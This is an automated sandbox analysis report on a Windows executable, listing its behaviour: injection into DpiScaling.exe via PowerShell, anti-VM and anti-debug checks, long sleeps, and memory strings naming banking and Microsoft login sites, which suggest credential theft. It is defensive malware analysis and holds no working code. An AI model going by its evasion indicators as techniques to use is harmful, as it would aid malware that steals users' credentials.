Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 4p5XLVXJnq.exe PID: 3572, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\DpiScaling.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: 3360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: 94B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: 7E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: A4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Memory allocated: B4B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Code function: 4_2_012F096E rdtsc

4_2_012F096E

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5634			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 556			Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\DpiScaling.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe TID: 3140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 2292	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 2292	Thread sleep time: -74000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe TID: 5696	Thread sleep time: -55000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\DpiScaling.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 9_2_0062CE10 FindFirstFileW,FindNextFileW,FindClose,

9_2_0062CE10

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: -631756.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: -631756.9.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: -631756.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 4p5XLVXJnq.exe, 00000000.00000002.2221247624.00000000015C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: -631756.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: -631756.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: -631756.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: -631756.9.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: -631756.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3910440192.000000000077F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2816681499.000001B39EB5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -631756.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: -631756.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: -631756.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: -631756.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: -631756.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: -631756.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: -631756.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: -631756.9.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 4p5XLVXJnq.exe, 00000000.00000002.2221247624.00000000015C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
Source: -631756.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: -631756.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Code function: 4_2_012F096E rdtsc

4_2_012F096E

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Code function: 4_2_004180A3 LdrLoadDll,

4_2_004180A3

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E0124 mov eax, dword ptr fs:[00000030h]	4_2_012E0124
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01370115 mov eax, dword ptr fs:[00000030h]	4_2_01370115
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135A118 mov ecx, dword ptr fs:[00000030h]	4_2_0135A118
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135A118 mov eax, dword ptr fs:[00000030h]	4_2_0135A118
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135A118 mov eax, dword ptr fs:[00000030h]	4_2_0135A118
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135A118 mov eax, dword ptr fs:[00000030h]	4_2_0135A118
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov ecx, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov ecx, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov ecx, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov eax, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E10E mov ecx, dword ptr fs:[00000030h]	4_2_0135E10E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384164 mov eax, dword ptr fs:[00000030h]	4_2_01384164
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384164 mov eax, dword ptr fs:[00000030h]	4_2_01384164
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01348158 mov eax, dword ptr fs:[00000030h]	4_2_01348158
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01344144 mov eax, dword ptr fs:[00000030h]	4_2_01344144
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01344144 mov eax, dword ptr fs:[00000030h]	4_2_01344144
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01344144 mov ecx, dword ptr fs:[00000030h]	4_2_01344144
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01344144 mov eax, dword ptr fs:[00000030h]	4_2_01344144
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01344144 mov eax, dword ptr fs:[00000030h]	4_2_01344144
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AC156 mov eax, dword ptr fs:[00000030h]	4_2_012AC156
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6154 mov eax, dword ptr fs:[00000030h]	4_2_012B6154
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6154 mov eax, dword ptr fs:[00000030h]	4_2_012B6154
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F0185 mov eax, dword ptr fs:[00000030h]	4_2_012F0185
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133019F mov eax, dword ptr fs:[00000030h]	4_2_0133019F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133019F mov eax, dword ptr fs:[00000030h]	4_2_0133019F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133019F mov eax, dword ptr fs:[00000030h]	4_2_0133019F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133019F mov eax, dword ptr fs:[00000030h]	4_2_0133019F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01354180 mov eax, dword ptr fs:[00000030h]	4_2_01354180
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01354180 mov eax, dword ptr fs:[00000030h]	4_2_01354180
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA197 mov eax, dword ptr fs:[00000030h]	4_2_012AA197
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA197 mov eax, dword ptr fs:[00000030h]	4_2_012AA197
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA197 mov eax, dword ptr fs:[00000030h]	4_2_012AA197
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136C188 mov eax, dword ptr fs:[00000030h]	4_2_0136C188
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136C188 mov eax, dword ptr fs:[00000030h]	4_2_0136C188
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E01F8 mov eax, dword ptr fs:[00000030h]	4_2_012E01F8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013861E5 mov eax, dword ptr fs:[00000030h]	4_2_013861E5
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0132E1D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0132E1D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0132E1D0
